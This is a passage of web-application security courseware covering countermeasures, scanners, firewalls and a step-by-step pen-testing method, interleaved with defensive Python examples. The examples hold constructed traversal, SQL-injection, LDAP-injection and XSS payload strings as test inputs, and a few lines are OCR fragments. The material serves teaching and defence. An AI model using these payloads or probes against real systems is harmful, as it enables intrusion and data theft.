Verify whether all the users' identities and credentials are stored in a hashed form.
Never submit session data as part of a GET, POST.
Cross-Site Request Forgery
Log off immediately after using a web application and clear the history.
Do not allow your browser and websites to save login details.
Check the HTTP Referrer header and, when processing a POST, ignore URL parameters.
Insecure Cryptographic Storage
Do not create or use weak cryptographic algorithms.
Generate encryption keys offline and store them securely.
Ensure that encrypted data stored on disk is not easy to decrypt.
Insufficient Transport Layer Protection
- Non-SSL requests to web pages should be redirected to the SSL page.
- Set the 'secure' flag on all sensitive cookies.
- Configure the SSL provider to support only strong algorithms.
- Ensure the certificate is valid, not expired, and matches all domains used by the site.
- Backend and other connections should also use SSL or other encryption technologies.
Directory Traversal
- Define access rights to the protected areas of the website.
- Apply checks and hotfixes that prevent exploitation of the vulnerability, including the Unicode-encoded forms used to bypass directory traversal filters.
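A traversal check that holds up against the encoded forms the countermeasure above mentions, as an added example that is not code from the CEH courseware. The document root, the request names and the list of overlong UTF-8 sequences are assumptions made for the demonstration; nothing is read from disk.

```python
"""Path-traversal guard. This is an added example, not code from the
CEH courseware: it applies the countermeasure above by canonicalising
a requested file name, including the percent-encoded and overlong
UTF-8 ("Unicode") forms used to slip '../' past naive string checks,
and only serving files that resolve inside the document root. The
document root and request names below are constructed for the
demonstration; nothing is read from disk."""
import os
from urllib.parse import unquote_to_bytes

DOC_ROOT = "/var/www/html"  # assumed document root for the demo

# Overlong UTF-8 encodings of '/', '\\' and '.' that some older servers
# decoded only after their traversal checks had already run.
_OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc0\xae": b"."}


def canonical_name(requested: str) -> str:
    """Decode the way a permissive server would, until nothing changes,
    then normalise separators. Double-encoded input (%252e) therefore
    cannot hide a traversal from the check that follows."""
    raw = requested.encode("utf-8")
    prev = None
    while raw != prev:
        prev = raw
        raw = unquote_to_bytes(raw)
    for bad, good in _OVERLONG.items():
        raw = raw.replace(bad, good)
    name = raw.decode("utf-8", "replace")
    return name.replace("\\", "/")


def check_request(root: str, requested: str):
    """Return the absolute path to serve, or None if the request would
    escape the document root (or contains a NUL byte)."""
    name = canonical_name(requested)
    if "\x00" in name:
        return None
    root_real = os.path.realpath(root)
    # Treat every request as relative to the root, then resolve '..'
    # and symlinks before comparing prefixes.
    candidate = os.path.realpath(os.path.join(root_real, name.lstrip("/")))
    if candidate == root_real or candidate.startswith(root_real + os.sep):
        return candidate
    return None


# Constructed requests: one legitimate, then traversal attempts in plain,
# percent-encoded, double-encoded, overlong-UTF-8 and backslash forms,
# and an absolute path that is simply re-rooted.
SAMPLE_REQUESTS = [
    "index.html",
    "../secret.txt",
    "%2e%2e%2fsecret.txt",
    "%252e%252e%252fsecret.txt",
    "..%c0%afsecret.txt",
    "..%5csecret.txt",
    "/etc/passwd",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req!r:32} -> {check_request(DOC_ROOT, req)}")
```

The decisive step is comparing the fully resolved path against the resolved root rather than searching the raw string for `..`: decoding to a fixed point and resolving with `realpath` means every spelling of the same escape collapses to the same answer, and a symlink inside the root that points outside it is rejected as well.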
Cookie/Session Poisoning
- Do not store a plain-text or weakly encrypted password in a cookie.
- Implement a cookie timeout.
- The cookie's authentication credentials should be associated with an IP address.
- Make logout functions available.
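The session and cookie countermeasures above (no credentials in the cookie, Secure flag, timeout, IP binding, working logout), put together in one small server-side session store as an added example that is not code from the CEH courseware. The idle timeout, cookie name and client addresses are assumed values chosen for the demonstration.

```python
"""Session-cookie hardening. This is an added example, not code from
the CEH courseware: it turns the cookie/session countermeasures above
into a small server-side session store. The cookie carries only an
opaque random token (never a password), is marked Secure and HttpOnly,
times out when idle, is bound to the client IP address, and logout
destroys the record so the token cannot be reused. IDLE_TIMEOUT and the
cookie name are assumed policy values."""
import secrets
import time
from http.cookies import SimpleCookie

IDLE_TIMEOUT = 15 * 60   # seconds of inactivity before a session dies
COOKIE_NAME = "sid"


class ManualClock:
    """Time source that can be advanced by hand, so the timeout path can
    be exercised without sleeping."""
    def __init__(self, now: float):
        self.now = now

    def __call__(self) -> float:
        return self.now


def _token_from_cookie(cookie_header: str):
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    morsel = cookie.get(COOKIE_NAME)
    return morsel.value if morsel is not None else None


def client_cookie(set_cookie: str) -> str:
    """What the browser sends back on later requests: the name=value
    pair only, without the attributes."""
    return set_cookie.split(";", 1)[0]


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # token -> {"user", "ip", "last_seen"}

    def login(self, username: str, client_ip: str) -> str:
        """Create a session after the password has been verified against
        its stored hash. Returns the Set-Cookie header value."""
        token = secrets.token_urlsafe(32)           # 256 random bits
        self._sessions[token] = {"user": username, "ip": client_ip,
                                 "last_seen": self._clock()}
        cookie = SimpleCookie()
        cookie[COOKIE_NAME] = token
        cookie[COOKIE_NAME]["secure"] = True        # TLS only
        cookie[COOKIE_NAME]["httponly"] = True      # hidden from script
        cookie[COOKIE_NAME]["samesite"] = "Strict"  # blunts CSRF
        cookie[COOKIE_NAME]["path"] = "/"
        return cookie[COOKIE_NAME].OutputString()

    def validate(self, cookie_header: str, client_ip: str):
        """Return the username for a live session, else None. Unknown
        tokens, a different client IP and idle sessions are rejected,
        and the stale record is removed so it cannot be retried."""
        token = _token_from_cookie(cookie_header)
        sess = self._sessions.get(token)
        if sess is None:
            return None
        now = self._clock()
        if sess["ip"] != client_ip or now - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[token]
            return None
        sess["last_seen"] = now
        return sess["user"]

    def logout(self, cookie_header: str) -> None:
        """Explicit logout: forget the session server-side, so the old
        token is useless even if the browser still holds it."""
        self._sessions.pop(_token_from_cookie(cookie_header), None)


if __name__ == "__main__":
    clock = ManualClock(1000.0)
    store = SessionStore(clock=clock)
    set_cookie = store.login("alice", "203.0.113.7")
    print(set_cookie)
    sent = client_cookie(set_cookie)
    print(store.validate(sent, "203.0.113.7"), store.validate(sent, "198.51.100.9"))
```

One caveat a practitioner will hit: binding the session to a client IP, as the countermeasure recommends, breaks legitimate users whose address changes mid-session (mobile networks, some proxies and NAT pools), so the check is usually applied to a subnet or combined with other signals rather than enforced on the exact address.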
File Injection Attack
- Strongly validate user input.
- Consider implementing a chroot jail.
- PHP: Disable allow_url_fopen and allow_url_include in php.ini.
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
- PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.
- Scan for the latest security vulnerabilities and apply the latest security patches.
LDAP Injection Attacks
- Make the LDAP filter as specific as possible.
- Disable verbose error messages and use custom error pages.

(Figure: the attacker reaches the login form over the Internet; the web application passes the input to the LDAP server on the operating system, and errors are returned through a custom error page.)

SQL Injection Attacks
- Sanitize and filter user input.
- Analyze the source code for SQL injection.
- Use stored procedures and parameterized queries.
- Connect to the database using a non-privileged account.
- Grant least privileges to the database, tables, and columns.
- Minimize the use of third-party applications.

injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameterized queries to retrieve data, and disable verbose error messages, which can give the attacker useful information; use custom error pages instead. To limit what SQL injection can do to the database, connect using a non-privileged account and grant least privileges to the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
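The parameterized-query and specific-LDAP-filter countermeasures from the two lists above, shown side by side with the vulnerable string-built query, as an added example that is not code from the CEH courseware. The SQLite table, the accounts and the payloads are constructed for the demonstration; the LDAP escaping follows RFC 4515.

```python
"""SQL and LDAP injection countermeasures. This is an added example,
not code from the CEH courseware: it runs the string-built query that
makes SQL injection possible beside the parameterised query from the
list above, against an in-memory SQLite database constructed here, and
escapes values placed into an LDAP search filter (RFC 4515) so the
filter can be kept as specific as the text recommends. Table layout,
accounts and payloads are constructed for the demonstration."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two accounts with (fake) password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "hash-a", "user"), ("admin", "hash-x", "admin")])
    return conn


def login_vulnerable(conn, username: str, pw_hash: str) -> list:
    """The injection sink: user input concatenated into the SQL text, so
    a quote in the username ends the string and '--' comments out the
    password check."""
    sql = (f"SELECT name FROM users WHERE name = '{username}' "
           f"AND pw_hash = '{pw_hash}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username: str, pw_hash: str) -> list:
    """Parameterised query: the values travel separately from the SQL,
    so whatever they contain is compared as data, never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND pw_hash = ?"
    return [row[0] for row in conn.execute(sql, (username, pw_hash))]


# RFC 4515 escaping for the assertion value of an LDAP search filter.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29",
                 "\x00": r"\00"}


def ldap_escape(value: str) -> str:
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def user_filter(username: str) -> str:
    """A specific filter: objectClass pinned, exactly one attribute
    matched, and the user-controlled value escaped, so input such as
    '*)(uid=*' cannot widen the match or add a clause."""
    return f"(&(objectClass=person)(uid={ldap_escape(username)}))"


# Constructed payloads
SQL_PAYLOAD = "admin' --"
LDAP_PAYLOAD = "*)(uid=*"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, SQL_PAYLOAD, "anything"))
    print("safe:      ", login_safe(db, SQL_PAYLOAD, "anything"))
    print("ldap:      ", user_filter(LDAP_PAYLOAD))
```

The least-privilege items in the list are not visible in this snippet but matter just as much: even the parameterized version should run under a database account that can only read the columns it needs, so that a query the developer missed cannot reach `xp_cmdshell` or write to other tables.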
Module Flow

(Module sections: Web App Concepts, Web App Threats, Hacking Methodology, Web App Pen Testing, Countermeasures, Security Tools.)

Now we will discuss web application security tools. Web application security tools help you detect possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked. Tools used alongside the countermeasures offer more protection.
Web Application Security Tool: Acunetix Web Vulnerability Scanner

Source: http://www.acunetix.com

injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It even tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications.

- Tests web forms and password-protected areas.
- Includes an automatic client script analyzer, allowing security testing of Ajax and Web 2.0 applications.

(Screenshot: an Acunetix scan of a test site reporting 77 alerts at Threat Level 3 (High): "One or more high severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website." Findings listed include SQL injection, cross-site scripting, user credentials sent in clear text, a login page open to password guessing, the OPTIONS method enabled, and a session cookie without the Secure flag.)
Web Application Security Tool: Watcher (Casaba Security)

Source: http://www.casaba.com

(Screenshot: Watcher Web Security Tool, Copyright 2010 Casaba Security, LLC, running as a Fiddler add-on. Its passive checks include: verifying the Cache-Control header on responses; checking that a Content-Type is included in the HTTP response; checking that the Internet Explorer XSS protection filter has not been disabled by the web application; checking that the X-Content-Type-Options defense against MIME sniffing has been declared; checking that the X-Frame-Options header is set to defend against clickjacking; looking for common error messages returned by databases that may indicate SQL injection; flagging dubious HTML comments that warrant further attention; and looking for sensitive information passed through URL parameters. The error-message check searches HTML content, including comments, for messages returned by platforms such as ASP.NET and web servers such as IIS and Apache; the list of debug messages to look for is configurable. One result shown reads "User input was found in the following data of an 'onerror' event".)
such as SQL
in a single integrated environment

Web Application Security Tool: Netsparker

(Screenshot: Netsparker 2.0.0.0 (Mavituna Security Limited) scanning http://test37.netsparker.com:8081/ and reporting a confirmed reflected cross-site scripting vulnerability in the parameter param of a page under /dilemma/ (32.php), using the attack pattern <script>alert(0x000016)</script>. Classification: PCI 2.0, PCI 1.2, OWASP 6.5.7, 6.5.1, A2. Scan information: 37 total requests, average speed 3.7 req/sec. Vulnerability details as shown: "XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the")
Web Application Security Tool: N-Stalker Web Application Security Scanner

Source: http://nstalker.com

N-Stalker Web Application Security Scanner provides an effective suite of web security assessment checks to enhance the overall security of your web applications against a wide range of vulnerabilities and sophisticated hacker attacks. It also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application's SDLC, including the ability to control information exposure, development flaws, infrastructure issues, and real security vulnerabilities that can be exploited by external agents. It contains all web security assessment checks, such as:

- Code injection
- Cross-site scripting
- Parameter tampering
- Web server vulnerabilities

(Screenshot: the N-Stalker scanner dashboard for a scan session, showing spidered and crawled URLs, findings grouped by High, Medium, Low and Info severity, bytes sent and received, total and failed requests, average response time, and 404 errors.)
Web Application Security Tool: VampireScan

Source: http://www.vampiretech.com

VampireScan allows users to test their own cloud and web applications for basic attacks and receive actionable results, all within their own web portal.

Features:
- Protect your website from hackers.
- Scan and protect your infrastructure and web applications from cyberthreats.
- Give you direct, actionable insight on high, medium, and low risk vulnerabilities.

(Screenshot: the VampireScan portal summary showing security grades, statistics, queued scans and scans in progress, account balance, and recent activity with per-scan vulnerability counts and grades.)
Web Application Security Tools

- Websecurify: http://www.websecurify.com
- OWASP ZAP: http://www.owasp.org
- NetBrute: http://www.rawlogic.com
- skipfish: http://code.google.com
- X5s: http://www.casaba.com
- SPIKE Proxy: http://www.immunitysec.com
- Ratproxy: http://code.google.com
- Syhunt Hybrid: http://www.syhunt.com
- WebWatchBot: http://www.exclamationsoft.com
- Exploit-Me: http://labs.securitycompass.com
- KeepNI: http://www.keepni.com
- WSDigger: http://www.mcafee.com
- Grabber: http://rgaucher.info
- Arachni: http://arachni-scanner.com
- xsss: http://www.syen.de
- Vega: http://www.subgraph.com
Web Application Firewall: dotDefender

(Screenshot: dotDefender configuration under IIS, Default Security Profile. Rule categories include Encoding, Buffer Overflow, SQL Injection, Cross-Site Scripting, Cookie Manipulation, Path Traversal, Probing, Remote Command Execution, Code Injection, Windows Directories, XML Schema, and XPath Injection, alongside a whitelist of permitted access, user-defined rules, and best practices. The SQL Injection category lets the administrator choose which attack patterns to intercept, for example Suspect Single Quote, Classic SQL Comment, SQL Comments, Union Select Statement, Select Version Statement, SQL CHAR Type, SQL SYS Commands, IS_SRVROLEMEMBER followed by "(", and MS SQL-specific SQL injection.)

Web Application Firewall: ServerDefender VP

Source: http://www.port80software.com

ServerDefender VP web application firewall is designed to provide security against web attacks

defacement, file alterations, and deletions.

(Screenshot: ServerDefender VP (port80) with protection for the Default Web Site and the Gauntlet site set to ON (the other modes are OFF and LOG ONLY). Tabs cover Input Validation, Buffer Overflow, Resources, Methods, URLs, File Uploads, and Exceptions; Generic Input Sanitization can be None, Minimum, or Extended, with a configurable list of byte values (0-9, 11, 12, 14-31, 127, 175-223, 255); enforcement levels range from 1 to 5. The statistics view shows total HTTP requests (26719), total sessions created (752), error counts, currently blocked IPs, and blocked-attack counts by category: SQL, XSS, Input, Cookie, Other.)
Web Application Firewalls

known and unknown attacks. They prevent data theft and manipulation of sensitive corporate and customer information. Commonly used web application firewalls are listed as follows:

- Radware's AppWall: http://www.radware.com
- ThreatSentry: http://www.privacyware.com
- QualysGuard WAF: http://www.qualys.com
- ThreatRadar: http://www.imperva.com
- ModSecurity: http://www.modsecurity.org
- Barracuda Web Application Firewall: https://www.barracudanetworks.com
- Stingray Application Firewall: http://www.riverbed.com
- IBM Security AppScan: http://www-01.ibm.com
- Trustwave WebDefend: https://www.trustwave.com
- Cyberoam's Web Application Firewall: http://www.cyberoam.com
may also become a victim

Web applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.
Web Application Pen Testing

Web application pen testing is used to identify, analyze, and report vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, and code execution, together with their associated risks. As a pen tester, you should test your web application for each of these classes of vulnerability. The best way to carry out a penetration test is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities.

Web application pen testing helps in:

- Identification of Ports: Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses.
- Verification of Vulnerabilities: Exploit the vulnerability in order to test and fix the issue.
- Remediation of Vulnerabilities: Retest the solution against the vulnerability to ensure that it is completely secure.
Web Application Pen Testing (Cont'd)

The general steps that you need to follow to conduct a web application penetration test are listed as follows. In the following sections, each step is explained in detail.

- Information Gathering
- Configuration Management Testing
- Authentication Testing
- Session Management Testing
- Web Services Testing
- Business Logic Testing
- Data Validation Testing
- AJAX Testing
- Denial-of-Service Testing
Information Gathering

Let's get into detail and discuss each web application test step thoroughly. The first step in web application pen testing is information gathering. To gather all the information about the target application, follow these steps:

- Retrieve and analyze the robots.txt file using tools such as GNU Wget (result: allowed and disallowed directories).
- Perform search engine reconnaissance: use the advanced "site:" search operator and then click "Cached".
- Identify application entry points using tools such as WebScarab, Burp Proxy, OWASP ZAP, TamperIE (for Internet Explorer), or Tamper Data (for Firefox).
- To identify web applications, probe for URLs, do dictionary-style searching (intelligent guessing), and perform vulnerability scanning using tools such as Nmap (port scanner) and Nessus. Check for web applications, old versions of files, or artifacts; old versions of files sometimes give useful information that attackers can use to launch attacks on the web application.
- Use techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, and querying search engines (googling).
- Analyze error codes by requesting invalid pages, and use alternate request methods (POST/PUT/other) in order to collect confidential information from the server (result: cookie information, 3xx and 4xx HTTP status codes, 500 internal server errors).
- Examine the source code of the accessible pages of the application front end.
- Test for recognized file types/extensions/directories by requesting common file extensions such as .ASP, .HTM, .PHP, and .EXE, and watch for any unusual output or error codes (result: issues of web application structure, error pages produced).
- Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap.
Configuration Management Testing

Once you have gathered information about the web application environment, test the configuration management. It is important to test configuration management because improper configuration may allow unauthorized users to break into the web application.

- Perform infrastructure configuration management testing: identify the ports associated with SSL/TLS-wrapped services using Nmap and Nessus, perform network scanning, and analyze the web server banner.
- Test the application configuration management using CGI scanners and by reviewing the contents of the web server, application server, comments, configuration, and logs.
- Use vulnerability scanners, spidering and mirroring tools, search engine queries, or manual inspection to test file extension handling.
- Review source code, and enumerate application pages and functionality.
- Perform directory and file enumeration, review server and application documentation, etc., to test for infrastructure and application admin interfaces.
- Review the OPTIONS HTTP method using Netcat or Telnet (result: information in the source code, log files, and default error codes).
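A small automation of the information-gathering and configuration-management checks described in the two sections above (robots.txt, OPTIONS, extension probing by status code, server banner), as an added example that is not code from the CEH courseware. To keep it runnable offline it probes a mock target started inside the same process; the banner, the robots.txt content and the responses are constructed for the demonstration, and `probe()` should only ever be pointed at hosts you are authorized to test.

```python
"""Information-gathering and configuration-management probes. This is
an added example, not code from the CEH courseware: it automates a few
of the checks above (robots.txt for disallowed directories, OPTIONS to
enumerate HTTP methods, requests for common extensions to fingerprint
the platform from status codes, and the Server banner) against a mock
target started inside this process, so it runs offline. The mock
server, its banner and its responses are constructed for the
demonstration; point probe() only at hosts you are authorised to test."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}
PROBE_EXTENSIONS = (".php", ".asp", ".aspx", ".jsp")


class MockTarget(BaseHTTPRequestHandler):
    """Constructed target: a PHP-like site that also leaves TRACE on."""
    protocol_version = "HTTP/1.1"

    def version_string(self):
        return "Apache/2.2.3"                       # constructed banner

    def log_message(self, *args):                   # keep stdout quiet
        pass

    def _reply(self, code, body=b"", extra=()):
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        for name, value in extra:
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if self.path == "/robots.txt":
            self._reply(200, b"User-agent: *\nDisallow: /admin/\n"
                             b"Disallow: /backup/\nAllow: /public/\n")
        elif self.path.endswith(".php"):
            self._reply(200, b"<html>ok</html>")
        else:
            self._reply(404, b"Not Found")

    def do_OPTIONS(self):
        self._reply(200, extra=[("Allow", "GET,HEAD,POST,OPTIONS,TRACE")])

    def do_PUT(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self._reply(405, b"Method Not Allowed")


def _fetch(conn, method, path, body=None):
    conn.request(method, path, body=body)
    resp = conn.getresponse()
    data = resp.read()
    return resp, data


def probe(host: str, port: int) -> dict:
    """Run the checks and return the findings as plain data."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    findings = {}
    resp, data = _fetch(conn, "GET", "/robots.txt")
    findings["server"] = resp.getheader("Server")
    findings["disallowed"] = [line.split(":", 1)[1].strip()
                              for line in data.decode().splitlines()
                              if line.lower().startswith("disallow:")]
    resp, _ = _fetch(conn, "OPTIONS", "/")
    methods = [m.strip() for m in (resp.getheader("Allow") or "").split(",")]
    findings["methods"] = [m for m in methods if m]
    findings["risky_methods"] = [m for m in findings["methods"] if m in RISKY_METHODS]
    status = {}
    for ext in PROBE_EXTENSIONS:
        resp, _ = _fetch(conn, "GET", "/index" + ext)
        status[ext] = resp.status
    findings["extension_status"] = status
    findings["likely_platform"] = [e for e, code in status.items() if code == 200]
    resp, _ = _fetch(conn, "PUT", "/upload.txt", body=b"probe")
    findings["put_status"] = resp.status   # 405 expected; 200/201 would be a finding
    conn.close()
    return findings


def run_demo() -> dict:
    """Start the mock target on a free local port, probe it, shut down."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockTarget)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The output is the same kind of evidence the sections above ask you to collect by hand with Wget, Netcat or Telnet: the disallowed directories are the first places to look, an advertised TRACE or PUT method is a configuration finding on its own, and the extension whose request returns 200 while the others return 404 tells you which platform to focus the later tests on.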
Authentication Testing

You need to perform the following steps to carry out authentication testing:

- Try to reset passwords by guessing, social engineering, or cracking secret questions, if used.
- Check if a "remember my password" mechanism is implemented by checking the HTML code of the login page.
- Check if it is possible to "reuse" a session after logout. Also check that the application automatically logs out a user who has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache (result: authentication vulnerabilities).
- Test for CAPTCHA: identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server, and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID (result: authentication vulnerabilities).
- Check if users hold a hardware device of some kind in addition to the password. Check if the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel.
- Test for race conditions: attempt to force a race condition by making multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review.
Session Management Testing

After testing the configuration management, test how the application manages sessions. The following are the steps to conduct session management pen testing:

- Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and forge a valid cookie in order to perform the attack.
- Test for cookie attributes using intercepting proxies such as WebScarab, Burp Proxy, OWASP ZAP, or traffic-intercepting browser plug-ins such as TamperIE (for IE) and Tamper Data (for Firefox).
- To test for session fixation, make a request to the site to be tested and analyze vulnerabilities using the WebScarab tool.
- Test for exposed session variables by inspecting encryption and reuse of session tokens, proxies and caching, GET and POST, and transport vulnerabilities.
- Test for CSRF (Cross-Site Request Forgery): examine the URLs in the restricted area (a successful CSRF compromises end-user data and operation, or the entire web application).
Authorization Testing

- Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application (a successful attack can gain access to reserved information).
- Test for bypassing the authorization schema by examining the admin functionality, to gain access to the resources assigned to a different role.
- Test for role/privilege manipulation.
C EH
(rtifwtf ttfciui Nm Im
Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, WebScarab, XSS-Proxy, ratproxy, and Burp Proxy
Analyze HTML code, test for stored XSS, leverage stored XSS, and verify whether the file upload allows setting arbitrary MIME types, using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant
Perform source code analysis to identify JavaScript coding errors
Analyze SWF files using tools such as SWFIntruder, Decompiler Flare, Compiler MTASC, Disassembler Flasm, Swfmill, and the debugger version of the Flash Plugin/Player
Perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc.
Use a trial and error approach by inserting ', | and other characters in order to check the application for errors. Use the tool Softerra LDAP Browser
Cookie information
Database information
check the application for errors. Use the tool Softerra LDAP Browser. The LDAP injection may
Discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, NHibernate, and Ruby On Rails
Try to insert XML metacharacters (information about XML structure)
Find out whether the web server actually supports SSI directives using tools such as the Burp Suite web proxy, OWASP ZAP, WebScarab, and a string searcher such as grep
Inject XPath code and interfere with the query result. Identify vulnerable parameters (access confidential information)
Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection
Data Validation Testing (Contd)
Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, NHibernate, and Ruby On Rails. This test gives information on SQL injection vulnerabilities.
Perform code injection testing: inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities
Perform OS commanding: perform manual code analysis and craft malicious HTTP requests using | to test for OS command injection attacks
Perform buffer overflow testing: perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow conditions (stack and heap memory information, application control flow)
Perform incubated vulnerability testing: upload a file that exploits a component in the local user workstation when viewed or downloaded by the user, and perform XSS and SQL injection attacks (server configuration and input validation schemes)
Test for HTTP splitting/smuggling: identify all user-controlled input that influences one or more headers in the response, and check whether a CR+LF sequence can be successfully injected into it (cookies and HTTP redirect information)
Data Validation Testing (Contd)
To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. It gives information about input validation errors.
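The HTTP splitting check above (user-controlled input that reaches a response header, such as a redirect target) comes down to whether a CR+LF can survive into the header. The following added example, not from the CEH material, shows a minimal redirect builder in its unsafe form beside a hardened form that rejects CR/LF both raw and percent-encoded and restricts the target to a local path; `build_redirect_unsafe`, `build_redirect_safe` and the other names are this example's own.

```python
from urllib.parse import unquote

# Constructed example: a handler that copies the "next" query parameter into the
# Location header of a raw HTTP/1.1 response.
def build_redirect_unsafe(next_url):
    """'Before' form: raw user input is concatenated into the header block."""
    return "HTTP/1.1 302 Found\r\nLocation: " + next_url + "\r\nContent-Length: 0\r\n\r\n"

def header_lines(raw_response):
    """Return the header lines of a raw HTTP response (excluding the status line),
    which makes an injected extra header directly visible."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return head.split("\r\n")[1:]

def validate_header_value(value):
    """Reject any value containing CR or LF, before or after percent-decoding,
    so an encoded %0d%0a cannot slip through a later decoding step."""
    for candidate in (value, unquote(value)):
        if "\r" in candidate or "\n" in candidate:
            raise ValueError("CR/LF not allowed in header value")
    return value

def build_redirect_safe(next_url):
    """Hardened form: validate the value, then allow only local relative paths
    (no scheme, no protocol-relative //host)."""
    target = validate_header_value(next_url)
    if not target.startswith("/") or target.startswith("//"):
        raise ValueError("redirect target must be a local path")
    return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\nContent-Length: 0\r\n\r\n"

def is_rejected(next_url):
    """True if the hardened builder refuses this value."""
    try:
        build_redirect_safe(next_url)
    except ValueError:
        return True
    return False
```

Most current web frameworks already refuse CR/LF in header values; the point of the test is to find the hand-rolled code paths that do not.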
Denial of Service Testing
Application information
Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process
Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins
Perform a manual source code analysis and submit a range of inputs with varying lengths to the application
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, then see if the server continues to respond
Denial of Service Testing
To check your web application against DoS attacks, follow these steps:
continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond maximum limit.
Denial of Service Testing (Contd)
Test for user input as a loop counter: enter an extremely large number in the input field that is used by the application as a loop counter (logical errors in an application)
Test for writing user-provided data to disk: use a script to automatically submit an extremely long value to the server in the request that is being logged (local disk exhaustion)
Test for proper release of resources: identify and send a large number of requests that perform database operations and observe any slowdown or new error messages (programming flaws)
Test for storing too much data in session: create a script to automate the creation of many new sessions with the server and run the request that is suspected of caching the data within the session for each one (session management errors)
Denial of Service Testing (Contd)
Step 5: Test for user input as a loop counter
Test for user input as a loop counter by entering an extremely large number in the input field that is used by the application as a loop counter. If the application fails to behave in its predefined manner, it contains a logical error.
To gather WS information use tools such as wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods
Use tools such as WSDigger, WebScarab, and Foundstone to automate web services security testing
Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing
Use web application vulnerability scanners such as WebScarab to test XML content-level vulnerabilities
Pass malicious content in the HTTP GET strings that invoke XML applications
Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment, to check whether the XML document has a SOAP attachment vulnerability
Attempt to resend a sniffed XML message using Wireshark and WebScarab
Information about SQL, XPath, buffer overflow, and command injection vulnerabilities
Web Services Testing
Step 1: Gather WS information
Gather WS information using tools such as Net Square wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods.
AJAX Testing
AJAX application call endpoints
Parse the HTML and JavaScript files (XMLHttpRequest object, JavaScript files, AJAX frameworks)
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax
